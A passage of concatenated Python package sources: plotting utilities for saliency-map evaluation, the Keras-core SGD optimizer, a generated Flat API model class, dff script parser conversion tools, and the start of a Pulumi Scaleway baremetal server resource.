IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| PypiClean |
/tootorch-1.9-py3-none-any.whl/tootourch/visualization.py | import h5py
import numpy as np
import json
from saliency.attribution_methods import *
from models import SimpleCNNDeconv
import matplotlib.pyplot as plt
def visualize_saliencys(origin_imgs, results, probs, preds, classes, names, target, row, col, savedir=None, **kwargs):
'''
Visualize selectivity logs
Args:
origin_imgs: original images
results: saliency maps
probs: probability by class
preds: predict class
classes: target class
names: attribution method names
target: target dataset. ['mnist','cifar10']
row : number of class
col : number of saliency maps
'''
# initialize
size = (col*3, row*3) if 'size' not in kwargs.keys() else kwargs['size']
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
labelsize = 10 if 'labelsize' not in kwargs.keys() else kwargs['labelsize']
dpi = 100 if 'dpi' not in kwargs.keys() else kwargs['dpi']
cmap = None if 'cmap' not in kwargs.keys() else kwargs['cmap']
if target=='mnist':
origin_imgs= origin_imgs.squeeze()
for i in range(len(results)):
results[i] = results[i].squeeze()
origin_color = 'gray'
color = 'gray' if cmap == None else cmap
else:
origin_color = None
color = cmap
_, ax = plt.subplots(row, col, figsize=size)
# original images
for i in range(row):
ax[i,0].imshow(origin_imgs[i], origin_color)
ax[i,0].set_ylabel('True: {0:}\nPred: {1:} ({2:.2%})'.format(classes[i], int(preds[i]), probs[i]), size=labelsize)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(row*(col-1)):
r = i//(col-1)
c = i%(col-1)
ax[r,c+1].imshow(results[c][r], color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(names[c], size=fontsize)
plt.subplots_adjust(wspace=-0.5, hspace=0)
plt.tight_layout()
if savedir:
plt.savefig(savedir, dpi=dpi)
def visualize_selectivity(target, methods, steps, sample_pct, save_dir, **kwargs):
'''
Visualize selectivity logs
Args:
target: target dataset. ['mnist','cifar10']
methods: attribution methods
steps: number of step
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# set results dictionary by attribution methods
attr_method_dict = {}
for i in range(len(methods)):
attr_method_dict[methods[i]] = {'data':[]}
# results load
for attr_method in attr_method_dict.keys():
hf = h5py.File(f'../evaluation/{target}_{attr_method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
attr_method_dict[attr_method]['data'] = hf
# Accuracy Change by Methods
_, ax = plt.subplots(1,len(methods)+1, figsize=size)
for i in range(len(methods)):
method = methods[i]
# results load
hf = h5py.File(f'../evaluation/{target}_{method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
# acc
acc = np.array(hf['acc'])
# plotting
ax[0].plot(range(steps+1), acc, label=method, color=color[i])
ax[0].legend()
# close
hf.close()
# text
ax[0].set_xlabel('# pixel removed', size=fontsize)
ax[0].set_ylabel('Accuracy', size=fontsize)
ax[0].set_title('[{}] Accuracy Change\nby Methods'.format(target.upper()), size=fontsize)
ax[0].set_ylim([0,1])
# Score Change by Methods
for i in range(len(methods)):
method = methods[i]
# results load
hf = h5py.File(f'../evaluation/{target}_{method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
# score
score = np.array(hf['score'])
mean_score = np.mean(score, axis=1)
# plotting average score
ax[i+1].plot(range(steps+1), mean_score, label=method, color=color[i], linewidth=4)
# sample index
np.random.seed(random_state)
sample_idx = np.random.choice(score.shape[1], 100, replace=False)
sample_score = score[:,sample_idx]
# plotting
for j in range(100):
ax[i+1].plot(range(steps+1), sample_score[:,j], color=color[i], linewidth=0.1)
# text
ax[i+1].set_xlabel('# pixel removed', size=fontsize)
ax[i+1].set_ylabel('Score for correct class', size=fontsize)
ax[i+1].set_title('[{}] {}\nScore Change'.format(target.upper(), method), size=fontsize)
ax[i+1].set_ylim([0,1])
# close
hf.close()
# figure adjust
plt.subplots_adjust(wspace=-0.5, hspace=0)
plt.tight_layout()
# save
plt.savefig(save_dir,dpi=dpi)
def visualize_ROARnKAR(targets, ratio_lst, eval_method, methods=None, attention=None, savedir=None, **kwargs):
'''
Visualize ROAR or KAR
Args:
dataset: target dataset. ['mnist','cifar10']
ratio_lst: pixel ratio list
eval_method: ['ROAR','KAR']
methods: attribution methods
attention: attention method
savedir: save path and save name
'''
if methods==None:
assert attention!=None, 'If methods is None, attention should not be None'
methods = attention
elif attention==None:
assert methods!=None, 'If methods is None, attention should not be None'
else:
t_methods = methods + attention
methods = t_methods.copy()
# if attention is not None, define methods list
for i in range(len(methods)):
if methods[i] == 'CAM':
methods[i] = 'CAM_CAM'
elif methods[i] == 'CBAM':
methods[i] = 'CBAM_CO'
elif methods[i] == 'RAN':
methods[i] = 'RAN_CO'
elif methods[i] == 'WARN':
methods[i] = 'WARN_CO'
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
marker = ['o','v','^','s','x','*','p','d'] if 'marker' not in kwargs.keys() else kwargs['marker']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# initialize methods acc by targets [mnist, cifar10]
test_acc = {target: {} for target in targets}
for target in targets:
test_acc[target] = {m: [] for m in methods}
# load test accuracy
def get_test_acc(methods, targets, test_acc):
for m in methods:
for target in targets:
if ('CAM' in m) or ('CBAM' in m):
model_name = '{}_{}_{}'.format('simple_cnn', target,m.split('_')[0])
elif (('RAN' in m) or ('WARN' in m)) & (m != 'RANDOM'):
model_name = '{}_{}'.format(target, m.split('_')[0])
else:
model_name = '{}_{}'.format('simple_cnn', target)
f = open('../logs/{}_logs.txt'.format(model_name),'r')
acc = json.load(f)['test_result']
test_acc[target][m].append(acc)
return test_acc
# load roar/kar accuracy
def get_roar_kar_test_acc(methods, targets, test_acc):
for target in targets:
for m in methods:
if (('RAN' in m) or ('WARN' in m)) & (m != 'RANDOM'):
model_name = '{}_{}'.format(target, m)
else:
model_name = '{}_{}_{}'.format('simple_cnn', target, m)
for ratio in ratio_lst[1:-1]:
f = open('../logs/{0:}_{1:}{2:.1f}_logs.txt'.format(model_name, eval_method, ratio),'r')
test_acc[target][m].append(json.load(f)['test_result'])
return test_acc
# insert 0
def get_0_test_acc(methods, targets, test_acc):
for target in targets:
for m in methods:
test_acc[target][m].append(0)
return test_acc
# ROAR or KAR
if eval_method=='ROAR':
test_acc = get_test_acc(methods, targets, test_acc)
test_acc = get_roar_kar_test_acc(methods, targets, test_acc)
test_acc = get_0_test_acc(methods, targets, test_acc)
elif eval_method=='KAR':
test_acc = get_0_test_acc(methods, targets, test_acc)
test_acc = get_roar_kar_test_acc(methods, targets, test_acc)
test_acc = get_test_acc(methods, targets, test_acc)
# plotting
f, ax = plt.subplots(1,2,figsize=size)
for i in range(len(targets)):
for j in range(len(methods)):
if methods[j] == 'RANDOM':
ax[i].plot(ratio_lst, test_acc[targets[i]][methods[j]], label=methods[j], color='black', linestyle='--', linewidth=3, alpha=0.5)
else:
ax[i].plot(ratio_lst, test_acc[targets[i]][methods[j]], label=methods[j], color=color[j], marker=marker[j])
ax[i].set_title(f'{eval_method} : {targets[i].upper()}', size=fontsize)
ax[i].set_ylabel('Test accuracy', size=fontsize)
ax[i].set_xlabel(f'% of input features replaced', size=fontsize)
ax[i].set_xlim([0,1])
ax[i].set_ylim([0,1])
ax[i].legend(loc='upper right')
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi)
def make_saliency_map(dataset, model, methods, attr_method_lst, name_lst, **kwargs):
'''
Make sliency map
Args:
dataset: target dataset. ['mnist','cifar10']
model: model to apply attribution method
methods: attribution methods
attr_method_lst: saliency map list
name_lst: attribution method name list
Return:
'''
if 'CO' in methods:
CO_attr = ConvOutput(model, **kwargs)
attr_method_lst.append(CO_attr)
name_lst.append('ConvOUtput')
if 'VBP' in methods:
VBP_attr = VanillaBackprop(model, **kwargs)
attr_method_lst.append(VBP_attr)
name_lst.append('Vanilla\nBackprop')
if 'IB' in methods:
IB_attr = InputBackprop(model, **kwargs)
attr_method_lst.append(IB_attr)
name_lst.append('Input\nBackprop')
if 'DeconvNet' in methods:
model_deconv = SimpleCNNDeconv(dataset)
deconvnet_attr = DeconvNet(model, model_deconv, **kwargs)
attr_method_lst.append(deconvnet_attr)
name_lst.append('DeconvNet')
if 'IG' in methods:
IG_attr = IntegratedGradients(model, **kwargs)
attr_method_lst.append(IG_attr)
name_lst.append('Integrated\nGradients')
if 'GB' in methods:
GB_attr = GuidedBackprop(model, **kwargs)
attr_method_lst.append(GB_attr)
name_lst.append('Guided\nBackprop')
if 'GC' in methods:
GC_attr = GradCAM(model, **kwargs)
attr_method_lst.append(GC_attr)
name_lst.append('Grad CAM')
if 'GBGC' in methods:
GBGC_attr = GuidedGradCAM(model, **kwargs)
attr_method_lst.append(GBGC_attr)
name_lst.append('Guided\nGrad CAM')
return attr_method_lst, name_lst
def visualize_coherence_models(dataset, images, pre_images, targets, idx2classes, model, methods, model_names, savedir=None, **kwargs):
'''
Visualize coherence map that compare to attribution methods
Args:
dataset: target dataset. ['mnist','cifar10']
images: original images
pre_images: preprocessed images to evaluate
target: targets to predict
idx2classes: index and class dictionary
model: model to apply attribution methods
methods: attribution methods to extract saliency map
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
wspace = 0 if 'wspace' not in kwargs.keys() else kwargs['wspace']
hspace = 0 if 'hspace' not in kwargs.keys() else kwargs['hspace']
params = {}
n = 0
for m in model_names:
for i in range(len(methods)):
if m == 'RAN':
params[n] = {'layer':5}
else:
params[n] = {}
n += 1
# attribution methods
attr_methods = []
name_lst = []
if isinstance(model, list):
for i, m in enumerate(model):
model_params = {'seq_name':'stages'} if model_names[i] == 'RAN' else {}
attr_methods, name_lst = make_saliency_map(dataset, m, methods, attr_methods, name_lst, **model_params)
name_lst[i] = name_lst[i] + f'\n{model_names[i]}'
# initialize results
nb_class = 10
nb_methods = len(attr_methods)
sal_maps_lst = np.zeros((nb_methods, ) + images.shape, dtype=np.float32)
# make saliency maps
for m in range(nb_methods):
sal_maps, _, _ = attr_methods[m].generate_image(pre_images, targets, **params[m])
sal_maps_lst[m] = sal_maps
# plotting
col = nb_methods + 1 # number of attribution methods + original image
_, ax = plt.subplots(nb_class, col, figsize=size)
# original images
color = 'gray' if dataset == 'mnist' else None
for i in range(nb_class):
img = images[i].squeeze() if dataset == 'mnist' else images[i]
ax[i,0].imshow(img, color)
ax[i,0].set_ylabel('{0:}'.format(idx2classes[i]), size=fontsize)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(nb_class*(col-1)):
r = i//(col-1)
c = i%(col-1)
sal_map = sal_maps_lst[c,r].squeeze() if dataset == 'mnist' else sal_maps_lst[c,r]
ax[r,c+1].imshow(sal_map, color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(name_lst[c], size=fontsize)
plt.subplots_adjust(wspace=wspace, hspace=hspace)
if savedir:
plt.tight_layout()
plt.savefig(savedir,dpi=dpi)
def visualize_coherence(dataset, images, pre_images, targets, idx2classes, model, methods, savedir=None, **kwargs):
'''
Visualize coherence map that compare to attribution methods
Args:
dataset: target dataset. ['mnist','cifar10']
images: original images
pre_images: preprocessed images to evaluate
target: targets to predict
idx2classes: index and class dictionary
model: model to apply attribution methods
methods: attribution methods to extract saliency map
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# attribution methods
attr_methods = []
name_lst = []
attr_methods, name_lst = make_saliency_map(dataset, model, methods, attr_methods, name_lst, **kwargs)
# initialize results
nb_class = 10
nb_methods = len(attr_methods)
sal_maps_lst = np.zeros((nb_methods, ) + images.shape, dtype=np.float32)
# make saliency maps
outputs = model(pre_images)
probs, preds = outputs.detach().max(1)
probs = probs.numpy()
preds = preds.numpy()
for m in range(nb_methods):
sal_maps, _, _ = attr_methods[m].generate_image(pre_images, targets)
sal_maps_lst[m] = sal_maps
# plotting
col = nb_methods + 1 # number of attribution methods + original image
f, ax = plt.subplots(nb_class, col, figsize=size)
# original images
color = 'gray' if dataset == 'mnist' else None
for i in range(nb_class):
img = images[i].squeeze() if dataset == 'mnist' else images[i]
ax[i,0].imshow(img, color)
ax[i,0].set_ylabel('True: {0:}\nPred: {1:} ({2:.2%})'.format(idx2classes[i], int(preds[i]), probs[i]), size=fontsize-5)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(nb_class*(col-1)):
r = i//(col-1)
c = i%(col-1)
sal_map = sal_maps_lst[c,r].squeeze() if dataset == 'mnist' else sal_maps_lst[c,r]
ax[r,c+1].imshow(sal_map, color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(name_lst[c], size=fontsize)
plt.subplots_adjust(wspace=0, hspace=0)
if savedir:
plt.tight_layout()
plt.savefig(savedir,dpi=dpi)
def visualize_trainlogs(train, valid, title, savedir=None, **kwargs):
'''
Visualize training log
Args:
train: training logs
valid: validation logs
title: graph title
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
f, ax = plt.subplots(figsize=size)
ax2 = ax.twinx()
ax.plot(np.arange(len(train['acc'])), train['acc'], label='Train Acc', color='r')
ax.plot(np.arange(len(valid['acc'])), valid['acc'], label='Valid Acc', color='c')
ax2.plot(np.arange(len(train['loss'])), train['loss'], label='Train Loss', color='g')
ax2.plot(np.arange(len(valid['loss'])), valid['loss'], label='Valid Loss', color='b')
plt.title(title, size=fontsize)
ax.legend(loc='upper right', fontsize=fontsize-2)
ax2.legend(loc='lower right', fontsize=fontsize-2)
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi)
def visualize_models_log(log_lst, model_names, train_yn, savedir=None, **kwargs):
'''
Visualize logs of models
Args:
log_lst: log list of models
model_names: model names
train_yn: train or validation
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
marker = ['o','v','^','s','x','*','p','d'] if 'marker' not in kwargs.keys() else kwargs['marker']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
nb_epoch = 30 if 'nb_epoch' not in kwargs.keys() else kwargs['nb_epoch']
metrics = {'acc':'Accuracy', 'loss':'Loss'}
f, ax = plt.subplots(1,2, figsize=size)
for i, (k, v) in enumerate(metrics.items()):
for j in range(len(log_lst)):
m_logs = log_lst[j][train_yn][0][k]
ax[i].plot(np.arange(nb_epoch), m_logs[:nb_epoch], label=model_names[j], color=color[j])
ax[i].set_title('Comparison of mode {}'.format(train_yn), size=fontsize)
ax[i].set_ylabel(v, size=fontsize)
ax[i].set_xlabel('Epochs', size=fontsize)
ax[i].legend()
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi) | PypiClean |
/keras-core-0.1.5.tar.gz/keras-core-0.1.5/keras_core/src/optimizers/sgd.py | from keras_core.src import ops
from keras_core.src.api_export import keras_core_export
from keras_core.src.optimizers import optimizer
@keras_core_export("keras_core.optimizers.SGD")
class SGD(optimizer.Optimizer):
"""Gradient descent (with momentum) optimizer.
Update rule for parameter `w` with gradient `g` when `momentum` is 0:
```python
w = w - learning_rate * g
```
Update rule when `momentum` is larger than 0:
```python
velocity = momentum * velocity - learning_rate * g
w = w + velocity
```
When `nesterov=True`, this rule becomes:
```python
velocity = momentum * velocity - learning_rate * g
w = w + momentum * velocity - learning_rate * g
```
Args:
learning_rate: A float, a
`keras_core.optimizers.schedules.LearningRateSchedule` instance, or
a callable that takes no arguments and returns the actual value to
use. The learning rate. Defaults to 0.01.
momentum: float hyperparameter >= 0 that accelerates gradient descent in
the relevant direction and dampens oscillations. Defaults to 0,
i.e., vanilla gradient descent.
nesterov: boolean. Whether to apply Nesterov momentum.
Defaults to `False`.
{{base_optimizer_keyword_args}}
"""
def __init__(
self,
learning_rate=0.01,
momentum=0.0,
nesterov=False,
weight_decay=None,
clipnorm=None,
clipvalue=None,
global_clipnorm=None,
use_ema=False,
ema_momentum=0.99,
ema_overwrite_frequency=None,
name="SGD",
**kwargs,
):
super().__init__(
learning_rate=learning_rate,
name=name,
weight_decay=weight_decay,
clipnorm=clipnorm,
clipvalue=clipvalue,
global_clipnorm=global_clipnorm,
use_ema=use_ema,
ema_momentum=ema_momentum,
ema_overwrite_frequency=ema_overwrite_frequency,
**kwargs,
)
if not isinstance(momentum, float) or momentum < 0 or momentum > 1:
raise ValueError("`momentum` must be a float between [0, 1].")
self.momentum = momentum
self.nesterov = nesterov
def build(self, variables):
"""Initialize optimizer variables.
SGD optimizer has one variable `momentums`, only set if `self.momentum`
is not 0.
Args:
var_list: list of model variables to build SGD variables on.
"""
if self.built:
return
super().build(variables)
self.momentums = []
if self.momentum != 0:
for variable in variables:
self.momentums.append(
self.add_variable_from_reference(
reference_variable=variable, name="momentum"
)
)
def update_step(self, gradient, variable, learning_rate):
"""Update step given gradient and the associated model variable."""
learning_rate = ops.cast(learning_rate, variable.dtype)
gradient = ops.cast(gradient, variable.dtype)
m = None
if self.momentum != 0:
m = self.momentums[self._get_variable_index(variable)]
if m is not None:
momentum = ops.cast(self.momentum, variable.dtype)
m.assign(-gradient * learning_rate + m * momentum)
if self.nesterov:
variable.assign(
variable - gradient * learning_rate + m * momentum
)
else:
variable.assign(variable + m)
else:
variable.assign(variable - gradient * learning_rate)
def get_config(self):
config = super().get_config()
config.update(
{
"momentum": self.momentum,
"nesterov": self.nesterov,
}
)
return config
SGD.__doc__ = SGD.__doc__.replace(
"{{base_optimizer_keyword_args}}", optimizer.base_optimizer_keyword_args
) | PypiClean |
/flat_api-1.0.0.tar.gz/flat_api-1.0.0/flat_api/model/class_assignment_update_microsoft_graph.py | import re # noqa: F401
import sys # noqa: F401
from flat_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from flat_api.exceptions import ApiAttributeError
class ClassAssignmentUpdateMicrosoftGraph(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'categories': ([str], none_type,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'categories': 'categories', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""ClassAssignmentUpdateMicrosoftGraph - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
categories ([str], none_type): List of categories this assignment belongs to. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', True)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
for arg in args:
if isinstance(arg, dict):
kwargs.update(arg)
else:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ClassAssignmentUpdateMicrosoftGraph - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
categories ([str], none_type): List of categories this assignment belongs to. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
for arg in args:
if isinstance(arg, dict):
kwargs.update(arg)
else:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.") | PypiClean |
/df_script_parser-0.2.0.tar.gz/df_script_parser-0.2.0/df_script_parser/tools.py | from pathlib import Path
import typing as tp
import logging
from black import format_file_in_place, FileMode, WriteBack
from df_script_parser.dumpers_loaders import yaml_dumper_loader
from df_script_parser.processors.dict_processors import Disambiguator
from df_script_parser.processors.recursive_parser import RecursiveParser
from df_script_parser.utils.namespaces import Import, From, Call
from df_script_parser.utils.exceptions import YamlStructureError
def py2yaml(
root_file: Path,
project_root_dir: Path,
output_file: Path,
requirements: tp.Optional[Path] = None,
):
"""Compress a dff project into a yaml file by parsing files inside PROJECT_ROOT_DIR starting with ROOT_FILE.
Extract imports, assignments of dictionaries and function calls from each file.
Recursively parse imported local modules. Collect non-local modules as project requirements
:param root_file: Python file to start parsing with
:type root_file: :py:class:`.Path`
:param project_root_dir: Directory that contains all the local files required to run ``root_file``
:type project_root_dir: :py:class:`.Path`
:param output_file: Yaml file to store parser output in
:type output_file: :py:class:`.Path`
:param requirements: Path to a file containing project requirements, defaults to None
:type requirements: :pu:class:`.Path`, optional
:return:
"""
with open(Path(output_file).absolute(), "w", encoding="utf-8") as outfile:
dictionary = RecursiveParser(Path(project_root_dir).absolute()).parse_project_dir(Path(root_file).absolute())
if requirements:
with open(requirements, "r", encoding="utf-8") as reqs:
dictionary["requirements"] = [x for x in reqs.read().split("\n") if x]
yaml_dumper_loader.dump(dictionary, outfile)
def yaml2py(
yaml_file: Path,
extract_to_directory: Path,
):
"""Extract project from a yaml file to a directory
:param yaml_file: Yaml file to extract from
:type yaml_file: :py:class:`.Path`
:param extract_to_directory: Directory to extract to
:type extract_to_directory: :py:class:`.Path`
:return: None
"""
with open(Path(yaml_file).absolute(), "r", encoding="utf-8") as infile:
processed_file = yaml_dumper_loader.load(infile)
namespaces = processed_file.get("namespaces")
requirements = processed_file.get("requirements")
if not namespaces:
raise YamlStructureError("No namespaces found")
if requirements is None:
raise YamlStructureError("No requirements found")
for namespace in namespaces:
path = namespace.split(".")
path_to_file = Path(extract_to_directory).absolute().joinpath(*path[:-1])
if not path_to_file.exists():
path_to_file.mkdir(parents=True, exist_ok=True)
path_to_file = path_to_file / (str(path[-1]) + ".py")
if path_to_file.exists():
logging.warning("File %s already exists", path_to_file)
with open(path_to_file, "w", encoding="utf-8") as outfile:
disambiguator = Disambiguator()
for name, value in namespaces[namespace].items():
if isinstance(value, (Import, From)):
outfile.write(repr(value) + f" as {name}\n")
elif isinstance(value, Call):
disambiguator.replace_lists_with_tuples = True
for arg in value.args:
value.args[arg] = disambiguator(value.args[arg])
outfile.write(f"{name} = {repr(value)}\n")
disambiguator.replace_lists_with_tuples = False
else:
disambiguator.replace_lists_with_tuples = False
outfile.write(f"{name} = {disambiguator(value)}\n")
disambiguator.add_name(name)
format_file_in_place(path_to_file, fast=False, mode=FileMode(), write_back=WriteBack.YES)
with open(extract_to_directory / "requirements.txt", "w", encoding="utf-8") as reqs:
reqs.write("\n".join(requirements)) | PypiClean |
/pulumi_scaleway-0.3.1a1656517281.tar.gz/pulumi_scaleway-0.3.1a1656517281/pulumi_scaleway/baremetal_server.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BaremetalServerArgs', 'BaremetalServer']
@pulumi.input_type
class BaremetalServerArgs:
def __init__(__self__, *,
offer: pulumi.Input[str],
os: pulumi.Input[str],
ssh_key_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BaremetalServer resource.
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
